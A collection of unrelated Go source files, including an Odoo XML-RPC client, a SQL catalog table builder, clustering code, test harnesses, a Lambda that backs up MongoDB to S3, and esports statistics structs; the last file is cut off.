StartDate *Time `xmlrpc:"start_date,omptempty"`
TimeToAnswer *Float `xmlrpc:"time_to_answer,omptempty"`
}
// ImLivechatReportOperators represents array of im_livechat.report.operator model.
type ImLivechatReportOperators []ImLivechatReportOperator
// ImLivechatReportOperatorModel is the odoo model name.
const ImLivechatReportOperatorModel = "im_livechat.report.operator"
// Many2One convert ImLivechatReportOperator to *Many2One.
func (iro *ImLivechatReportOperator) Many2One() *Many2One {
return NewMany2One(iro.Id.Get(), "")
}
// CreateImLivechatReportOperator creates a new im_livechat.report.operator model and returns its id.
func (c *Client) CreateImLivechatReportOperator(iro *ImLivechatReportOperator) (int64, error) {
ids, err := c.CreateImLivechatReportOperators([]*ImLivechatReportOperator{iro})
if err != nil {
return -1, err
}
if len(ids) == 0 {
return -1, nil
}
return ids[0], nil
}
// CreateImLivechatReportOperator creates a new im_livechat.report.operator model and returns its id.
func (c *Client) CreateImLivechatReportOperators(iros []*ImLivechatReportOperator) ([]int64, error) {
var vv []interface{}
for _, v := range iros {
vv = append(vv, v)
}
return c.Create(ImLivechatReportOperatorModel, vv)
}
// UpdateImLivechatReportOperator updates an existing im_livechat.report.operator record.
func (c *Client) UpdateImLivechatReportOperator(iro *ImLivechatReportOperator) error {
return c.UpdateImLivechatReportOperators([]int64{iro.Id.Get()}, iro)
}
// UpdateImLivechatReportOperators updates existing im_livechat.report.operator records.
// All records (represented by ids) will be updated by iro values.
func (c *Client) UpdateImLivechatReportOperators(ids []int64, iro *ImLivechatReportOperator) error {
return c.Update(ImLivechatReportOperatorModel, ids, iro)
}
// DeleteImLivechatReportOperator deletes an existing im_livechat.report.operator record.
func (c *Client) DeleteImLivechatReportOperator(id int64) error {
return c.DeleteImLivechatReportOperators([]int64{id})
}
// DeleteImLivechatReportOperators deletes existing im_livechat.report.operator records.
func (c *Client) DeleteImLivechatReportOperators(ids []int64) error {
return c.Delete(ImLivechatReportOperatorModel, ids)
}
// GetImLivechatReportOperator gets im_livechat.report.operator existing record.
func (c *Client) GetImLivechatReportOperator(id int64) (*ImLivechatReportOperator, error) {
iros, err := c.GetImLivechatReportOperators([]int64{id})
if err != nil {
return nil, err
}
if iros != nil && len(*iros) > 0 {
return &((*iros)[0]), nil
}
return nil, fmt.Errorf("id %v of im_livechat.report.operator not found", id)
}
// GetImLivechatReportOperators gets im_livechat.report.operator existing records.
func (c *Client) GetImLivechatReportOperators(ids []int64) (*ImLivechatReportOperators, error) {
iros := &ImLivechatReportOperators{}
if err := c.Read(ImLivechatReportOperatorModel, ids, nil, iros); err != nil {
return nil, err
}
return iros, nil
}
// FindImLivechatReportOperator finds im_livechat.report.operator record by querying it with criteria.
func (c *Client) FindImLivechatReportOperator(criteria *Criteria) (*ImLivechatReportOperator, error) {
iros := &ImLivechatReportOperators{}
if err := c.SearchRead(ImLivechatReportOperatorModel, criteria, NewOptions().Limit(1), iros); err != nil {
return nil, err
}
if iros != nil && len(*iros) > 0 {
return &((*iros)[0]), nil
}
return nil, fmt.Errorf("im_livechat.report.operator was not found with criteria %v", criteria)
}
// FindImLivechatReportOperators finds im_livechat.report.operator records by querying it
// and filtering it with criteria and options.
func (c *Client) FindImLivechatReportOperators(criteria *Criteria, options *Options) (*ImLivechatReportOperators, error) {
iros := &ImLivechatReportOperators{}
if err := c.SearchRead(ImLivechatReportOperatorModel, criteria, options, iros); err != nil {
return nil, err
}
return iros, nil
}
// FindImLivechatReportOperatorIds finds records ids by querying it
// and filtering it with criteria and options.
func (c *Client) FindImLivechatReportOperatorIds(criteria *Criteria, options *Options) ([]int64, error) {
ids, err := c.Search(ImLivechatReportOperatorModel, criteria, options)
if err != nil {
return []int64{}, err
}
return ids, nil
}
// FindImLivechatReportOperatorId finds record id by querying it with criteria.
func (c *Client) FindImLivechatReportOperatorId(criteria *Criteria, options *Options) (int64, error) {
ids, err := c.Search(ImLivechatReportOperatorModel, criteria, options)
if err != nil {
return -1, err
}
if len(ids) > 0 {
return ids[0], nil
}
return -1, fmt.Errorf("im_livechat.report.operator was not found with criteria %v and options %v", criteria, options)
}
|
package exec
import (
"github.com/cockroachdb/cockroach/pkg/sql/coltypes"
"github.com/cockroachdb/cockroach/pkg/sql/sem/tree"
"github.com/petermattis/opttoy/v4/cat"
)
type createTable struct {
catalog *cat.Catalog
tbl *cat.Table
}
func (ct *createTable) execute(stmt *tree.CreateTable) *cat.Table {
tn, err := stmt.Table.Normalize()
if err != nil {
fatalf("%s", err)
}
ct.tbl = &cat.Table{Name: cat.TableName(tn.Table())}
for _, def := range stmt.Defs {
switch def := def.(type) {
case *tree.ColumnTableDef:
ct.addColumn(def)
case *tree.UniqueConstraintTableDef:
ct.addUniqueConstraintKey(def)
case *tree.IndexTableDef:
ct.addIndexKey(def)
case *tree.ForeignKeyConstraintTableDef:
ct.addTableForeignKey(def)
default:
unimplemented("%T", def)
}
}
// Add the new table to the catalog.
ct.catalog.AddTable(ct.tbl)
return ct.tbl
}
func (ct *createTable) addColumn(def *tree.ColumnTableDef) {
notNull := def.PrimaryKey || (def.Nullable.Nullability == tree.NotNull)
typ := coltypes.CastTargetToDatumType(def.Type)
col := cat.Column{Name: cat.ColumnName(def.Name), NotNull: notNull, Type: typ}
ord := ct.tbl.AddColumn(&col)
if def.Unique || def.PrimaryKey {
key := ct.addKey(&cat.TableKey{
Primary: def.PrimaryKey,
Unique: true,
Columns: []cat.ColumnOrdinal{ord},
})
if key.Name == "" {
if def.PrimaryKey {
key.Name = "primary"
} else {
key.Name = string(def.Name) + "_idx"
}
}
}
if def.HasFKConstraint() {
refTable, err := def.References.Table.Normalize()
if err != nil {
fatalf("%s", err)
}
ref := ct.catalog.Table(cat.TableName(refTable.Table()))
var refCols []cat.ColumnOrdinal
if def.References.Col != "" {
refCols = []cat.ColumnOrdinal{ref.ColumnOrdinal(cat.ColumnName(def.References.Col))}
} else {
for _, key := range ref.Keys {
if key.Primary {
refCols = key.Columns
break
}
}
if refCols == nil {
fatalf("%s does not contain a primary key", ref.Name)
}
}
ct.addForeignKey(ref, []cat.ColumnOrdinal{ord}, refCols)
}
}
func (ct *createTable) addUniqueConstraintKey(def *tree.UniqueConstraintTableDef) {
cols := ct.extractColumns(&def.IndexTableDef)
if def.PrimaryKey {
for _, i := range cols {
ct.tbl.Columns[i].NotNull = true
}
}
key := ct.addKey(&cat.TableKey{
Primary: def.PrimaryKey,
Unique: true,
Columns: cols,
})
if key.Name == "" {
key.Name = string(def.Name)
if key.Name == "" {
key.Name = "primary"
}
}
}
func (ct *createTable) addIndexKey(def *tree.IndexTableDef) {
key := ct.addKey(&cat.TableKey{
Unique: true,
Columns: ct.extractColumns(def),
})
if key.Name == "" {
key.Name = string(def.Name)
}
}
func (ct *createTable) addTableForeignKey(def *tree.ForeignKeyConstraintTableDef) {
refTable, err := def.Table.Normalize()
if err != nil {
fatalf("%s", err)
}
ref := ct.catalog.Table(cat.TableName(refTable.Table()))
var toCols []cat.ColumnOrdinal
if len(def.ToCols) == 0 {
for _, key := range ref.Keys {
if key.Primary {
toCols = key.Columns
break
}
}
if toCols == nil {
fatalf("%s does not contain a primary key", ref.Name)
}
} else {
toCols = extractNames(ref, def.ToCols)
}
if len(def.FromCols) != len(toCols) {
fatalf("invalid foreign key specification: %s(%s) -> %s(%s)",
ct.tbl.Name, def.FromCols, ref.Name, def.ToCols)
}
ct.addForeignKey(ref, extractNames(ct.tbl, def.FromCols), toCols)
}
func (ct *createTable) addKey(key *cat.TableKey) *cat.TableKey {
existing := ct.getKey(key)
if existing != nil {
existing.Primary = existing.Primary || key.Primary
existing.Unique = existing.Unique || key.Unique
existing.NotNull = existing.NotNull || key.NotNull
return existing
}
key.NotNull = true
for _, i := range key.Columns {
key.NotNull = key.NotNull && ct.tbl.Columns[i].NotNull
}
return ct.tbl.AddKey(key)
}
func (ct *createTable) getKey(key *cat.TableKey) *cat.TableKey {
for i := range ct.tbl.Keys {
existing := &ct.tbl.Keys[i]
if existing.EqualColumns(key) {
return existing
}
}
return nil
}
func (ct *createTable) addForeignKey(dst *cat.Table, srcColumns, dstColumns []cat.ColumnOrdinal) {
srcKey := ct.addKey(&cat.TableKey{Columns: srcColumns})
if srcKey.Fkey != nil {
fatalf("foreign key already defined for %d", srcColumns)
}
srcKey.Fkey = &cat.ForeignKey{
Referenced: dst,
Columns: dstColumns,
}
}
func (ct *createTable) extractColumns(def *tree.IndexTableDef) []cat.ColumnOrdinal {
res := make([]cat.ColumnOrdinal, len(def.Columns))
for i, col := range def.Columns {
res[i] = ct.tbl.ColumnOrdinal(cat.ColumnName(col.Column))
}
return res
}
func extractNames(tbl *cat.Table, names tree.NameList) []cat.ColumnOrdinal {
res := make([]cat.ColumnOrdinal, len(names))
for i, name := range names {
res[i] = tbl.ColumnOrdinal(cat.ColumnName(name))
}
return res
}
|
// Copyright 2020 Humility AI Incorporated, All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package hdbscan
func (c *Clustering) scoreClusters(optimization string) {
switch optimization {
case VarianceScore:
c.varianceScores()
default:
c.stabilityScores()
}
}
func (c *Clustering) varianceScores() {
c.setNormalizedSizes()
c.setNormalizedVariances()
c.Clusters.setVarianceScores()
}
func (c clusters) setVarianceScores() {
for _, cluster := range c {
cluster.score = cluster.size / cluster.variance
}
}
func (c *Clustering) setNormalizedSizes() {
// distro
var sizes []float64
for _, cluster := range c.Clusters {
size := float64(len(cluster.Points))
sizes = append(sizes, size)
cluster.size = size
}
}
func (c *Clustering) setNormalizedVariances() {
// variances
var variances []float64
for _, cluster := range c.Clusters {
// data
var clusterData [][]float64
for _, pointIndex := range cluster.Points {
clusterData = append(clusterData, c.data[pointIndex])
}
variance := GeneralizedVariance(len(cluster.Points), len(clusterData[0]), unfold(clusterData))
cluster.variance = isNum(variance)
variances = append(variances, cluster.variance)
}
}
func (c *Clustering) stabilityScores() {
// TODO: implement
}
func (c *cluster) calculateStability() float64 {
if len(c.Points) > 0 {
// var sum float64
// for _, pIndex := range c.points {
// }
// calculate sum of points (1 / e_min) - (1 / e_max)
// e_min = points mrg
return c.score
}
var stability float64
// for _, childCluster := range c.children {
// childStability := childCluster.calculateStability(mrg)
// stability += childStability
// }
return stability
}
func potentialStability(c *cluster) float64 {
// if leaf node: return stability
// else: return max(stability, sum-of-children-stabilities)
return 0
}
|
package main
import (
"fmt"
"sync"
)
func return_tls() int64
func return_g() int64
func baseadd(x, y int64) int64 // 全局变量的使用
func getg() uint64
func address(pi *int) int // 解引用 pi 指针,返回值
func t_fp_sp() (int64, int64) // fp 和 sp 的关系
func t_for(a int64) int64 // 一个 for 循环的实现
func t_fp_bp() (int64, int64) // fp 和 bp 的相对关系
func t_moveups(in1, int2 int64) (out1, out2 int64) // 测试 MOVUPS 指令,一次移动 128 bit
//
func t_fp_vsp_sp() (r_fp, r_vsp, r_sp uint64) // 测试 fp vsp sp 之间的关系, stack 为 0 的时候
func t_fp_vsp_sp_stack_16() (r_fp, r_vsp, r_sp uint64) // 测试 fp vsp sp 之间的关系, stack 为 16 的时候
//
func inside(in1 int64) (r1 int64) // implement r1 = in1 + 1
func outside(in1 int64) (r1 int64) // return r1 = inside(in1)
//
func whichCallOutside(in1 int64) {
re1 := outside(in1)
fmt.Printf("-----%v, outside,re1:%v\n", in1, in1+1 == re1) // should print true
}
func main() {
var wg sync.WaitGroup
for idx := 0; idx < 5; idx++ {
wg.Add(1)
go testprint(&wg, idx)
}
wg.Wait()
}
func testprint(wg *sync.WaitGroup, a int) {
fmt.Printf("-----%v, tls,%x\n", a, return_tls())
fmt.Printf("-----%v, g,%x\n", a, return_g())
{
h, y := t_fp_sp()
fmt.Printf("-----%v, t_fp_sp,%x, %x\n", a, h, y)
}
{
h := t_for(int64(a))
fmt.Printf("-----%v, t_for, %x\n", a, h)
}
{
h, y := t_fp_bp()
fmt.Printf("-----%v, t_fp_bp,%x, %x\n", a, h, y)
}
{
h, y := t_moveups(123, 321)
fmt.Printf("-----%v, t_moveups,%v, %v\n", a, h, y)
}
{
fp, vsp, sp := t_fp_vsp_sp()
fmt.Printf("-----%v, t_fp_vsp_sp,fp:%x vsp:%x sp:%x\n", a, fp, vsp, sp)
}
{
fp, vsp, sp := t_fp_vsp_sp_stack_16()
fmt.Printf("-----%v, t_fp_vsp_sp_stack_16,fp:%x vsp:%x sp:%x\n", a, fp, vsp, sp)
}
{
whichCallOutside(int64(a))
}
wg.Done()
}
|
package pipa
import "github.com/Shopify/sarama"
// --------------------------------------------------------------------
var _ Consumer = &testConsumer{}
type testConsumer struct {
messages chan *sarama.ConsumerMessage
lastMark *sarama.ConsumerMessage
}
func newTestConsumer(messages ...sarama.ConsumerMessage) *testConsumer {
mch := make(chan *sarama.ConsumerMessage, len(messages))
for i := range messages {
m := messages[i]
mch <- &m
}
close(mch)
return &testConsumer{messages: mch}
}
func (c *testConsumer) Messages() <-chan *sarama.ConsumerMessage { return c.messages }
func (c *testConsumer) MarkOffset(m *sarama.ConsumerMessage, _ string) { c.lastMark = m }
func (c *testConsumer) Close() error { return nil }
|
package main
import (
"errors"
"fmt"
"os"
"time"
"github.com/aws/aws-lambda-go/lambda"
"gopkg.in/pipe.v2"
)
func runBackup() (string, error) {
//Set Path for Lambda to call local executables
os.Setenv("PATH", os.Getenv("PATH")+":"+os.Getenv("LAMBDA_TASK_ROOT"))
//Set Vars
var exitMessage string
// Get Env Variables and assign
fileName := os.Getenv("FILENAME") + "-" + time.Now().Format("20060102150405")
bucketName := os.Getenv("BUCKETNAME")
mongoHost := os.Getenv("MONGOHOST")
mongoUsername := os.Getenv("MONGOUSERNAME")
mongoPW := os.Getenv("MONGOPW")
authDB := os.Getenv("AUTHDB")
backupDB := os.Getenv("BACKUPDB")
// Check if all Env Variables are valid
if fileName == "" {
return "", errors.New("No FILENAME Env Var")
}
if bucketName == "" {
return "", errors.New("No BUCKETNAME Env Var")
}
if mongoHost == "" {
return "", errors.New("No MONGOHOST Env Var")
}
if mongoUsername == "" {
return "", errors.New("No MONGOUSERNAME Env Var")
}
if mongoPW == "" {
return "", errors.New("No MONGOPW Env Var")
}
if authDB == "" {
return "", errors.New("No AUTHDB Env Var")
}
if backupDB == "" {
return "", errors.New("No BACKUPDB Env Var")
}
//Setup Command 1
cmd1Name := "mongodump"
cmd1Args := []string{
"--host",
mongoHost,
"--ssl",
"--username",
mongoUsername,
"--password",
mongoPW,
"--authenticationDatabase",
authDB,
"--db",
backupDB,
"--archive"}
//Setup Command 2
cmd2Name := "aws"
cmd2Args := []string{
"s3",
"cp",
"-",
"s3://" + bucketName + "/" + fileName}
//Assign pipe of the two commands
p := pipe.Line(
pipe.Exec(cmd1Name, cmd1Args...),
pipe.Exec(cmd2Name, cmd2Args...),
)
//Run the pip and get the output
output, err := pipe.CombinedOutput(p)
fmt.Printf("%s", output)
if err != nil {
fmt.Printf("%v\n", err)
return "%v\n", err
} else {
fmt.Println("Successfully uploaded to S3")
exitMessage = "Backup Run Successfully"
}
return exitMessage, err
}
func main() {
lambda.Start(runBackup)
}
|
// Copyright 2019 Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved. This file is licensed under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package testflow_test
import (
"context"
"strings"
argov1 "github.com/argoproj/argo/v2/pkg/apis/workflow/v1alpha1"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"github.com/gardener/test-infra/pkg/testmachinery"
tmv1beta1 "github.com/gardener/test-infra/pkg/apis/testmachinery/v1beta1"
"github.com/gardener/test-infra/test/resources"
"github.com/gardener/test-infra/test/utils"
)
var _ = Describe("testflow exit tests", func() {
Context("onExit", func() {
It("should not run ExitHandlerTestDef when testflow succeeds", func() {
ctx := context.Background()
defer ctx.Done()
tr := resources.GetTestrunWithExitHandler(resources.GetBasicTestrun(operation.TestNamespace(), operation.Commit()), tmv1beta1.ConditionTypeSuccess)
tr, wf, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeSucceeded, TestrunDurationTimeout)
defer utils.DeleteTestrun(operation.Client(), tr)
Expect(err).ToNot(HaveOccurred())
numExecutedTestDefs := 0
for _, node := range wf.Status.Nodes {
if strings.HasPrefix(node.TemplateName, "exit-handler-testdef") && node.Phase == argov1.NodeSucceeded {
numExecutedTestDefs++
}
}
Expect(numExecutedTestDefs).To(Equal(1), "Testrun: %s", tr.Name)
})
It("should not run exit-handler-testdef when testflow succeeds", func() {
ctx := context.Background()
defer ctx.Done()
tr := resources.GetTestrunWithExitHandler(resources.GetBasicTestrun(operation.TestNamespace(), operation.Commit()), tmv1beta1.ConditionTypeError)
tr, wf, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeSucceeded, TestrunDurationTimeout)
defer utils.DeleteTestrun(operation.Client(), tr)
Expect(err).ToNot(HaveOccurred())
numExecutedTestDefs := 0
for _, node := range wf.Status.Nodes {
if strings.HasPrefix(node.TemplateName, "exit-handler-testdef") && node.Phase != argov1.NodeSkipped {
numExecutedTestDefs++
}
}
Expect(numExecutedTestDefs).To(Equal(0), "Testrun: %s", tr.Name)
})
It("should run exit-handler-testdef when testflow fails", func() {
ctx := context.Background()
defer ctx.Done()
tr := resources.GetTestrunWithExitHandler(resources.GetFailingTestrun(operation.TestNamespace(), operation.Commit()), tmv1beta1.ConditionTypeError)
tr, wf, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeFailed, TestrunDurationTimeout)
defer utils.DeleteTestrun(operation.Client(), tr)
Expect(err).ToNot(HaveOccurred())
numExecutedTestDefs := 0
for _, node := range wf.Status.Nodes {
if strings.HasPrefix(node.TemplateName, "exit-handler-testdef") && node.Phase != argov1.NodeSkipped {
numExecutedTestDefs++
}
}
Expect(numExecutedTestDefs).To(Equal(1), "Testrun: %s", tr.Name)
})
})
Context("phase", func() {
It("testmachinery phase should be propagated to default and onExit testflow with its right values", func() {
ctx := context.Background()
defer ctx.Done()
tr := resources.GetBasicTestrun(operation.TestNamespace(), operation.Commit())
tr.Spec.TestFlow = tmv1beta1.TestFlow{
{
Name: "int-test",
Definition: tmv1beta1.StepDefinition{
Name: "check-dynamic-envvar-testdef",
Config: []tmv1beta1.ConfigElement{
{
Type: tmv1beta1.ConfigTypeEnv,
Name: "ENV_NAME",
Value: testmachinery.TM_PHASE_NAME,
},
{
Type: tmv1beta1.ConfigTypeEnv,
Name: "ENV_VALUE",
Value: string(testmachinery.PhaseRunning),
},
},
},
},
}
tr.Spec.OnExit = tmv1beta1.TestFlow{
{
Name: "int-test",
Definition: tmv1beta1.StepDefinition{
Name: "check-dynamic-envvar-testdef",
Config: []tmv1beta1.ConfigElement{
{
Type: tmv1beta1.ConfigTypeEnv,
Name: "ENV_NAME",
Value: testmachinery.TM_PHASE_NAME,
},
{
Type: tmv1beta1.ConfigTypeEnv,
Name: "ENV_VALUE",
Value: string(testmachinery.PhaseExit),
},
},
},
},
}
tr, _, err := operation.RunTestrunUntilCompleted(ctx, tr, argov1.NodeSucceeded, TestrunDurationTimeout)
defer utils.DeleteTestrun(operation.Client(), tr)
Expect(err).ToNot(HaveOccurred())
})
})
})
|
package structs
import (
"encoding/json"
)
// TeamStats holds performance statistics about a particular Team.
type TeamStats struct {
Streak struct {
Series struct {
StreakScope // defined in stats.go
} `json:"series,omitempty"`
Match struct {
StreakScope // defined in stats.go
} `json:"match,omitempty"`
} `json:"streak,omitempty"`
Winrate struct {
Series struct {
WinrateSeriesScope // defined in stats.go
} `json:"series,omitempty"`
Match struct {
WinrateMatchScope // defined in stats.go
} `json:"match,omitempty"`
} `json:"winrate,omitempty"`
Nemesis *struct {
Series struct {
Competitor Team `json:"competitor,omitempty"` // defined in stats.go
Losses int64 `json:"losses"`
} `json:"series,omitempty"`
Match struct {
Competitor Team `json:"competitor,omitempty"` // defined in stats.go
Losses int64 `json:"losses"`
} `json:"match,omitempty"`
} `json:"nemesis,omitempty"`
Dominating *struct {
Series struct {
Competitor Team `json:"competitor,omitempty"` // defined in stats.go
Wins int64 `json:"wins"`
} `json:"series,omitempty"`
Match struct {
Competitor Team `json:"competitor,omitempty"` // defined in stats.go
Wins int64 `json:"wins"`
} `json:"match,omitempty"`
} `json:"dominating,omitempty"`
PlayByPlay TeamPlayByPlayStats `json:"play_by_play"`
}
type TeamPlayByPlayStats interface{}
type teamStats TeamStats
func (t *TeamStats) UnmarshalJSON(data []byte) error {
var partial map[string]json.RawMessage
if err := json.Unmarshal(data, &partial); err != nil {
return err
}
pbp_data := partial["play_by_play"]
// This seems to be faster than not doing it
delete(partial, "play_by_play")
data, _ = json.Marshal(partial)
// Unmarshal every but the "play_by_play" key
var tt teamStats
if err := json.Unmarshal(data, &tt); err != nil {
return err
}
// Find out the top keys of pbp_data
var pbp_map map[string]json.RawMessage
if err := json.Unmarshal(pbp_data, &pbp_map); err != nil {
return err
}
// Dota
if _, ok := pbp_map["faction_stats"]; ok {
var tmp DotaTeamStats
// Unmarshal the play_by_play data into tt.PlayByPlay
if err := json.Unmarshal(pbp_data, &tmp); err != nil {
return err
}
tt.PlayByPlay = tmp
}
// Lol
if _, ok := pbp_map["side_stats"]; ok {
var tmp LolTeamStats
// Unmarshal the play_by_play data into tt.PlayByPlay
if err := json.Unmarshal(pbp_data, &tmp); err != nil {
return err
}
tt.PlayByPlay = tmp
}
// CS
if _, ok := pbp_map["totals"]; ok {
var tmp CsTeamStats
// Unmarshal the play_by_play data into tt.PlayByPlay
if err := json.Unmarshal(pbp_data, &tmp); err != nil {
return err
}
tt.PlayByPlay = tmp
}
*t = TeamStats(tt)
return nil
}
// CsTeamStats holds data about a team play by play stats for cs
type CsTeamStats struct {
Totals struct {
Kills int64 `json:"kills"`
Deaths int64 `json:"deaths"`
CsTeamCommonStats
} `json:"totals"`
Maps []struct {
Map Map `json:"map"`
CsTeamCommonStats
} `json:"maps"`
Marksman []struct {
PlayerId int64 `json:"player_id"`
Adr float64 `json:"adr"`
Weapon Weapon `json:"weapon"`
} `json:"marksman"`
TopStats struct {
Kills struct {
PlayerAgainst
Kills int64 `json:"kills"`
} `json:"kills"`
Adr struct {
PlayerAgainst
Adr float64 `json:"adr"`
} `json:"adr"`
Assists struct {
PlayerAgainst
Assists int64 `json:"assists"`
} `json:"assists"`
Plants struct {
PlayerAgainst
Plants int64 `json:"plants"`
} `json:"plants"`
Defuses struct {
PlayerAgainst
Defuses int64 `json:"defuses"`
} `json:"defuses"`
} `json:"top_stats"`
TopMatches struct {
BiggestLoss struct {
TeamAgainst
Rounds int64 `json:"rounds"`
} `json:"biggest_loss"`
BiggestWin struct {
TeamAgainst
Rounds int64 `json:"rounds"`
} `json:"biggest_win"`
MostRounds struct {
TeamAgainst
Rounds int64 `json:"rounds"`
} `json:"most_rounds"`
} `json:"top_matches"`
}
// CsTeamCommonStats holds information common to multiple JSON objects.
type CsTeamCommonStats struct {
NrMatches int64 `json:"nr_matches"`
CtRounds int64 `json:"ct_rounds"`
CtWins int64 `json:"ct_wins"`
TRounds int64 `json:"t_rounds"`
TWins int64 `json:"t_wins"`
PistolRounds int64 `json:"pistol_rounds"`
PistolWins int64 `json:"pistol_wins"`
FirstKillRate float64 `json:"first_kill_rate"`
FirstDeathRate float64 `json:"first_death_rate"`
}
// DotaTeamStats holds data about a teams play by play stats for dota
type DotaTeamStats struct {
FactionStats struct {
Radiant struct {
Matches int64 `json:"matches"`
Wins int64 `json:"wins"`
} `json:"radiant"`
Dire struct {
Matches int64 `json:"matches"`
Wins int64 `json:"wins"`
} `json:"dire"`
} `json:"faction_stats"`
Drafts struct {
Own struct {
MostPicked []DotaHeroWithWins `json:"most_picked"`
MostBanned []DotaHeroWithWins `json:"most_banned"`
} `json:"own"`
Opponents struct {
MostPicked []DotaHeroWithWins `json:"most_picked"`
MostBanned []DotaHeroWithWins `json:"most_banned"`
} `json:"opponents"`
} `json:"drafts"`
TopStats struct {
Kills struct {
DotaPlayerAgainst
Kills int64 `json:"kills"`
} `json:"kills"`
Gpm struct {
DotaPlayerAgainst
Gpm float64 `json:"gpm"`
} `json:"gpm"`
Xpm struct {
DotaPlayerAgainst
Xpm float64 `json:"xpm"`
} `json:"xpm"`
DmgGiven struct {
DotaPlayerAgainst
DmgGiven float64 `json:"dmg_given"`
} `json:"dmg_given"`
CreepKills struct {
DotaPlayerAgainst
LastHits int64 `json:"last_hits"`
} `json:"creep_kills"`
CreepDenies struct {
DotaPlayerAgainst
Denies int64 `json:"denies"`
} `json:"creep_denies"`
} `json:"top_stats"`
TopMatches struct {
AvgLength float64 `json:"avg_length"`
Longest struct {
Won struct {
TeamAgainst
Length int64 `json:"length"`
} `json:"won"`
Lost struct {
TeamAgainst
Length int64 `json:"length"`
} `json:"lost"`
} `json:"longest"`
Shortest struct {
Won struct {
TeamAgainst
Length int64 `json:"length"`
} `json:"won"`
Lost struct {
TeamAgainst
Length int64 `json:"length"`
} `json:"lost"`
} `json:"shortest"`
AvgKpm float64 `json:"avg_kpm"`
Kpm struct {
Highest struct {
Kpm float64 `json:"kpm"`
TeamAgainst
} `json:"highest"`
Lowest struct {
Kpm float64 `json:"kpm"`
TeamAgainst
} `json:"lowest"`
} `json:"kpm"`
} `json:"top_matches"`
Average struct {
Match struct {
Kills *float64 `json:"kills"`
Deaths *float64 `json:"deaths"`
Assists *float64 `json:"assists"`
Gpm *float64 `json:"gpm"`
Xpm *float64 `json:"xpm"`
Length *float64 `json:"length"`
Wards struct {
Observers struct {
Killed *float64 `json:"killed"`
Placed *float64 `json:"placed"`
} `json:"observers"`
Sentries struct {
Killed *float64 `json:"killed"`
Placed *float64 `json:"placed"`
} `json:"sentries"`
} `json:"wards"`
Structures struct {
Towers struct {
Taken *float64 `json:"taken"`
Lost *float64 `json:"lost"`
Denied *float64 `json:"denied"`
} `json:"towers"`
Barracks struct {
Taken *float64 `json:"taken"`
Lost *float64 `json:"lost"`
Denied *float64 `json:"denied"`
} `json:"barracks"`
} `json:"structures"`
Creeps struct {
Lane struct {
Kills *float64 `json:"kills"`
Denies *float64 `json:"denies"`
} `json:"lane"`
Neutral struct {
Roshan *float64 `json:"roshan"`
Total *float64 `json:"total"`
} `json:"neutral"`
} `json:"creeps"`
FirstBlood struct {
Rate *float64 `json:"rate"`
TakenAt *float64 `json:"taken_at"`
} `json:"first_blood"`
} `json:"match"`
} `json:"average"`
}
type LolTeamStats struct {
NrMatches int64 `json:"nr_matches"`
NrWins int64 `json:"nr_wins"`
SideStats struct {
Purple struct {
NrMatches int64 `json:"nr_matches"`
NrWins int64 `json:"nr_wins"`
} `json:"purple"`
Blue struct {
NrMatches int64 `json:"nr_matches"`
NrWins int64 `json:"nr_wins"`
} `json:"blue"`
} `json:"side_stats"`
Average struct {
Match struct {
Kills *float64 `json:"kills"`
Deaths *float64 `json:"deaths"`
Assists *float64 `json:"assists"`
Gpm *float64 `json:"gpm"`
Length *float64 `json:"length"`
Wards struct {
Killed *float64 `json:"killed"`
Placed *float64 `json:"placed"`
} `json:"wards"`
Structures struct {
Turrets struct {
Taken *float64 `json:"taken"`
Lost *float64 `json:"lost"`
} `json:"turrets"`
Inhibitors struct {
Taken *float64 `json:"taken"`
Lost *float64 `json:"lost"`
} `json:"inhibitors"`
} `json:"structures"`
Creeps struct {
Lane struct {
Kills *float64 `json:"kills"`
} `json:"lane"`
Neutral struct {
Baron *float64 `json:"baron"`
Dragon *float64 `json:"dragon"`
Heralds *float64 `json:"heralds"`
Total *float64 `json:"total"`
} `json:"neutral"`
} `json:"creeps"`
FirstBlood struct {
Rate *float64 `json:"rate"`
TakenAt *float64 `json:"taken_at"`
} `json:"first_blood"`
} `json:"match"`
} `json:"average"`
Champions []struct {
NrMatches int64 `json:"nr_matches"`
NrWins int64 `json:"nr_wins"`
Champion Champion `json:"champion"`
} `json:"champions"`
TopStats struct {
Kills LolPlayerAgainst `json:"kills"`
Gpm LolPlayerAgainst `json:"gpm"`
Xpm LolPlayerAgainst `json:"xpm"`
DoubleKills *LolPlayerAgainst `json:"double_kills"`
TripleKills *LolPlayerAgainst `json:"triple_kills"`
QuadraKills *LolPlayerAgainst `json:"quadra_kills"`
PentaKills *LolPlayerAgainst `json:"Penta_kills"`
UnrealKills *LolPlayerAgainst `json:"Unreal_kills"`
LargestKillingSpree *LolPlayerAgainst `json:"largest_killing_spree"`
LargestMultiKill *LolPlayerAgainst `json:"largest_multi_kill"`
} `json:"top_stats"`
TopMatches struct {
Kpm struct {
Avg float64 `json:"avg"` // Only lol
Highest struct {
LolTeamAgainst
} `json:"highest"`
Lowest struct {
LolTeamAgainst
} `json:"lowest"`
} `json:"kpm"`
Length struct {
Avg float64 `json:"avg"`
Longest struct {
Won LolTeamAgainst `json:"won"`
Lost LolTeamAgainst `json:"lost"`
} `json:"longest"`
Shortest struct {
Won LolTeamAgainst `json:"won"`
Lost LolTeamAgainst `json:"lost"`
} `json:"shortest"`
} `json:"length"`
} `json:"top_matches"`
}
// TeamAgainst is a collection of common data when examining specific stats.
// It is grouped with the specific stat in another struct.
type TeamAgainst struct {
